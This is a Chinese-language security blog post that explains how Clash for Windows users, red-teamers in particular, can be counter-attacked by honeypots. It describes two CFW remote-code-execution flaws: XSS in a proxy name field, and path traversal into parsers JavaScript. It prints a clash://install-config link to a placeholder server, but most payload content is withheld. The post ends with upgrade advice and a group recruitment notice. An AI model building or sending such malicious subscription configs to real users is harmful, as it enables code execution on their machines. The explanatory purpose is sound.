关于挂着clash被反制的解释

免责声明

月落星沉研究室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他违法行为！！！
  最近更新文章不是很勤快，因为最近在打护网啊，全国各地都在跑，什么湖南，广东，广西，江西，虽说去过的地方还不少勒，但是红队的话也还是挺累的，由于看到之前有个新闻，某个公司的安全工程师由于clash被反制，所以想着今天有空就来给大家来讲讲clash的反制，给各个远程红队的大哥提醒点吧，蓝队的溯源不是吃干饭的，同时也提醒各个大哥要遵纪守法，只对正规授权的站点去攻击和入侵，切记非授权！！

clash是一款支持Windows、macOS、Android等多平台的代理软件。在安全圈这个行业还是很受大家喜爱的。

Clash初次运行会在~/.config/clash/目录产生一个名为config.yaml的主配置文件，文件内容如下。

更多的内容就不方便展示了......

 这份文件是clash的基础配置文件，他的端口设置会随Clash启动生效。

Clash的使用也是基于一份配置文件，同样只需将可用的主配置文件放到配置文件的目录下，之后就可以使用了。也可以选择将远程链接填入Url栏中，可自动下载远程的配置文件到本地。

我们了解了这个之后，去公网上面看看有关于clash的漏洞，大多都是远程代码执行漏洞。

我来给大家大致讲解clash几个漏洞的原理吧。

由于crash_for_windows_pkg可以根据URL下载进行配置Rules文件，crash_for_windows_pkg由Electron提供支持，该产品在代理规则配置文件中未设置严格的输入检测，攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。

漏洞利用

一：CFW XSS2RCE漏洞

方法1：crash_for_windows_pkg 由 Electron 提供支持，该产品在代理规则配置文件中未设置严格的输入检测，攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。"proxies"中的"name"字段嵌入html标签，"onerror"时触发语句执行。

- name: a   可以使用本地导入的方式，将yaml的配置文件导入。

方法2：另一种方式使用浏览器弹窗进行操作。

clash://install-config?url=http://ip:port/eval.txt&name=RCE

输入poc，在poc当中的在【Profiles】中输入URI进行下载，成功后切入【Proxies】界面，点击即可触发漏洞。

第二个关于clash的漏洞：CFW路径穿越致使parsers JS RCE

漏洞的原理是利用了clash的规则提供者进行远程更新的时候对路径的不安全处理导致可以覆盖掉clash for windows的配置文件, 而clash的的配置文件中又保存了clash for windows的各种设置, 如pasers等...而pasers这项功能可以实现执行JavaScript代码, 实现通过js来调用本地的应用程序等功能, 从而获得各种系统权限。

制作好的在线clash配置yaml文件, 文件内容为该段poc, 其中的url字段为在线服务器的url/ip地址, 这样由该yaml形成的clash订阅地址就成为了我们的利用的关键点, 一旦任何一个订阅地址中被攻击者插入该恶意代码, 即可对订阅者造成危害

打开刚刚的配置文件, 根据其中的内容, 我们可知其插入的这段代码会调用电脑的计算器，恶意代码需要自行去配置哈

对clash的任何配置文件进行手动更新, 都会无法更新, 因而只有重启clash客户端后才会产生效果, 此时如果重启了clash for windows客户端, 再次对订阅地址进行更新或者下载任何新的订阅(不论是不是被插入恶意代码的订阅)都会执行cfw-settings.yaml中的恶意代码, 这里可见不论更新哪个订阅都会启动计算器。

现在的商业蜜罐也是很强的，打了攻击流量就会触发蜜罐反制规则，导致被自己会被rce。

Clash的修复方法也是有很多的，把自己的clash版本升级到最高就可以避免很多问题。

最近团队的师傅也是拿了很多的奖项

各个省级，地市级护网都是第一第二，具体点的话就是南方省市这一块，广东，浙江，江西，包括行业护网，红队确实是赚钱，但是在攻击的时候要小心被溯源哦，不然攻击成果都个个白废，要知道应急也是很头疼的！！！

本文由月落星辰团队编写，我们会在群里发送公开直播课链接，群聊已满的添加Vx：linjialelovejesus，备注进群听课。

   欢迎各位网安工程师加入月落安全研究实验室，一起学习交流讨论！（已加入一二三四五群的无需重复加群，听课链接我们会同步）